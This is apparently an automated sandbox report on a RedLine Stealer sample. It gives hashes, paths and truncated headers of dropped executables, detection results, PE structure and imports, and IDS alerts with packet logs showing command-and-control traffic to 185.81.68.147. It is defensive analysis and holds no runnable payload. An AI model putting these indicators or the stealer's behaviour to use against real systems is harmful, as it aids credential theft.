                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1096264
                                                                                                                                                                                                                        Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                        MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                        SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                        SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                        SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\systemsx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):309760
                                                                                                                                                                                                                        Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                        MD5:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                        SHA1:226A6FBD66992A0F2DDBF5D7572FAB2CF8F5001E
                                                                                                                                                                                                                        SHA-256:4A55DA3C91388A8EA539FC750B52DD90AF5D2F33F2E7269A73C2146243ED24CD
                                                                                                                                                                                                                        SHA-512:9174BD1C379ED76BE342400949A1E431A6430297485FD9C48ED12C60E7DE94817B75D645C4EBB17B3A79D66BA813C40C36527F912E927A8EC27E4668D9C09DD8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A..A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d....r^g.........."......:...4.......4.........@..........................................@.................................................pr..(.......(.......L....................................................................P..X............................text....8.......:.................. ..`.rdata...#...P...$...>..............@..@.data...............................@....pdata..L............b..............@..@.rsrc...(............f..............@..@.x64.....P.......P...j..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\systemsx.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):307712
                                                                                                                                                                                                                        Entropy (8bit):6.283898970170584
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:O2JKCwoXjMvjfTK/zNTdEpZ4m1qpxXQKQrUJ0tYRVAOTIdTsImm:8CwoXjMbTKLNhEpZ4m0vXQKQrxgu
                                                                                                                                                                                                                        MD5:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                                                                        SHA1:D3406BF8D0E9AC246C272FA284A35A3560BDBFF5
                                                                                                                                                                                                                        SHA-256:0A17E2CA8F223DE67C0864FAC1D24C7BB2D0C796C46E9CE04E4DFF374C577EA1
                                                                                                                                                                                                                        SHA-512:181B1E2BD08978B6EE3DA2B48E0B113623B85C42AB8CEC2A23BD5119ABA7105FDEEF9B7B00343D37B0C8344494640CE0A51615393DEF8242334420134F75871F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d....SXg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......R...`..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\Desktop\Grabber.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2000000
                                                                                                                                                                                                                        Entropy (8bit):1.3174564123367891
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfvxzI1aIqTcUTGhoY1y:oq6+ouCpk2mpcWJ0r+QNTBfvFI+Y
                                                                                                                                                                                                                        MD5:7BCE43CC96CC747B5909B5FA404C7FFE
                                                                                                                                                                                                                        SHA1:3065EC384E6141143F613C56869545EE02C413A6
                                                                                                                                                                                                                        SHA-256:7A6019033FF050C41D0A2CF3047D6679EDEE582708970535B65A2E3DACBD9B1D
                                                                                                                                                                                                                        SHA-512:E6F20334D034CA78AA7BB78F0BC61E7DC04DCCDBC9E2947F78F40563D1C65419C45DC14C91175BD83957BBECE5EBD959BFFE920D70AAFC6C7BE3863302AC175F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Grabber.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....<...............0....@.........................................................................|q..........p...........................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc...p............V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):2.8738882384881608
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:K6qneGSDSB.exe
                                                                                                                                                                                                                        File size:2'672'128 bytes
                                                                                                                                                                                                                        MD5:52c82f6ceb8cf41de8a4c01b313e3712
                                                                                                                                                                                                                        SHA1:69b699431dbbee3b6fd76d762a27db30f1f792b5
                                                                                                                                                                                                                        SHA256:0a9bec73980eb6774e0e50da9dd812551d20a7d839020976ebdc0fb93ed2ebf9
                                                                                                                                                                                                                        SHA512:b1022ea6a0859679f33c7d01918a2b63278205f61d9d0d77be8f34f5f973ae67b0f049353358521dac3dc0e1f43af93204f2cda17b0a0e3d4f28708d69f12aab
                                                                                                                                                                                                                        SSDEEP:12288:CId+rFKcOyCwoXjMbTKLNhEpZ4m0vXQKQrxgbcv0NTR:7d+9CwoXjMbTUhgqm01cvkTR
                                                                                                                                                                                                                        TLSH:C7C536C22381E096F297613EC01457F4DE6AACE5F225CD8B5290BE6E3A331C14BD7A57
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..C;n.C;n.C;n..Cm.F;n..Ck..;n..Cj.I;n..Co.@;n.C;o..;n...m.J;n...j.S;n...k.h;n.W.g.B;n.W.l.B;n.RichC;n.........PE..d....[Xg...

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:0f0d57969617070f

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x140001b6c
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x67585BF2 [Tue Dec 10 15:19:14 2024 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:47087efffcd29d4c0a6c8a29360deeec

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                        call 00007F5FE51A4EE0h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                        jmp 00007F5FE51A4A6Fh
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        cmp ecx, dword ptr [000174A9h]
                                                                                                                                                                                                                        jne 00007F5FE51A4C02h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        rol ecx, 10h
                                                                                                                                                                                                                        test cx, FFFFh
                                                                                                                                                                                                                        jne 00007F5FE51A4BF3h
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        ror ecx, 10h
                                                                                                                                                                                                                        jmp 00007F5FE51A52C7h
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                                                                        jmp 00007F5FE51A4C01h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ecx, ebx
                                                                                                                                                                                                                        call 00007F5FE51A8FF2h
                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                        je 00007F5FE51A4C05h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ecx, ebx
                                                                                                                                                                                                                        call 00007F5FE51A905Eh
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                        je 00007F5FE51A4BD9h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        add esp, 20h
                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        cmp ebx, FFFFFFFFh
                                                                                                                                                                                                                        je 00007F5FE51A4BF8h
                                                                                                                                                                                                                        call 00007F5FE51A53D8h
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        call 00007F5FE51A40CAh
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        jmp 00007F5FE51A53ECh
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        lea eax, dword ptr [0000D797h]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [ecx], eax
                                                                                                                                                                                                                        test dl, 00000001h
                                                                                                                                                                                                                        je 00007F5FE51A4BFCh
                                                                                                                                                                                                                        mov edx, 00000018h
                                                                                                                                                                                                                        call 00007F5FE51A4BCBh
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov eax, ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        add esp, 20h
                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                        call 00007F5FE51A5688h
                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                        je 00007F5FE51A4C13h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov eax, dword ptr [00000030h]

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x183140x28.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2510000x3f0c4.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x24f0000xf6c.pdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2500000x688.reloc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x16a700x38.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x169300x140.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xf0000x250.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000xd6c00xd8007edfdf1c7fa56ca23e14fef624511a12False0.5919596354166666data6.434619687813369IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0xf0000x9ad80x9c00f7fe3d2d39b8871c2798825c2a09b851False0.4179186698717949data4.629568648709481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0x190000x2354f80x234400ebf64b61c4d348aaf134ea4adde54bb8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .pdata0x24f0000xf6c0x10007d902051aef0a0a5d08edd385fbf694dFalse0.4677734375data4.738426819629228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .reloc0x2500000x6880x8009a9e49b840103d1f62a030c9badcdd2bFalse0.4990234375data4.922451644131149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0x2510000x3f0c40x3f200c507745b6bf7361f3190829782b82367False0.035032487623762376data2.8756617613603876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_ICON0x2510b80x3eff8Device independent bitmap graphic, 250 x 500 x 32, image size 2500000.03466129282281817
                                                                                                                                                                                                                        RT_GROUP_ICON0x2900b00x14data1.15

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllWriteFile, CreateFileW, LoadLibraryA, CloseHandle, GetProcAddress, CreateProcessW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, WriteConsoleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                        2024-12-15T09:12:07.859403+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549707185.81.68.14780TCP
                                                                                                                                                                                                                        2024-12-15T09:12:10.502400+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549708185.81.68.14780TCP
                                                                                                                                                                                                                        2024-12-15T09:12:11.312305+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:11.312305+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:11.747831+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.549709TCP
                                                                                                                                                                                                                        2024-12-15T09:12:16.838110+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:17.275073+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.549709TCP
                                                                                                                                                                                                                        2024-12-15T09:12:17.585683+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:18.059346+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:18.560307+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:18.864446+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:19.934900+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:20.239393+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:20.551913+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:21.044107+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:22.123287+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:22.563933+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:23.696023+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:24.134576+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:24.574403+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:25.139811+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:25.618679+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:26.056348+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:26.495368+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:26.932334+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:27.682095+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:27.802215+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:32.460143+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:33.130578+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:33.566408+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:34.002387+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP
                                                                                                                                                                                                                        2024-12-15T09:12:34.479473+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549709185.81.68.1471912TCP

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 15, 2024 09:12:01.652513027 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:01.772844076 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:01.773288012 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:01.773372889 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:01.893335104 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.104958057 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.105074883 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.105305910 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.106086016 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.106379986 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.226392031 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.226522923 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.226645947 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.236634016 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.356617928 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.356776953 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.478722095 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.842247009 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.842297077 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.842472076 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.843570948 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.843867064 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.963711977 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.963762999 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.963905096 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.964103937 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:05.084047079 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:05.084320068 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:05.204210043 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.407574892 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.407761097 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.407828093 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.409437895 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.410125017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.530831099 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.531419039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.531532049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.531620979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.651972055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859174013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859225988 CET8049707185.81.68.147192.168.2.5
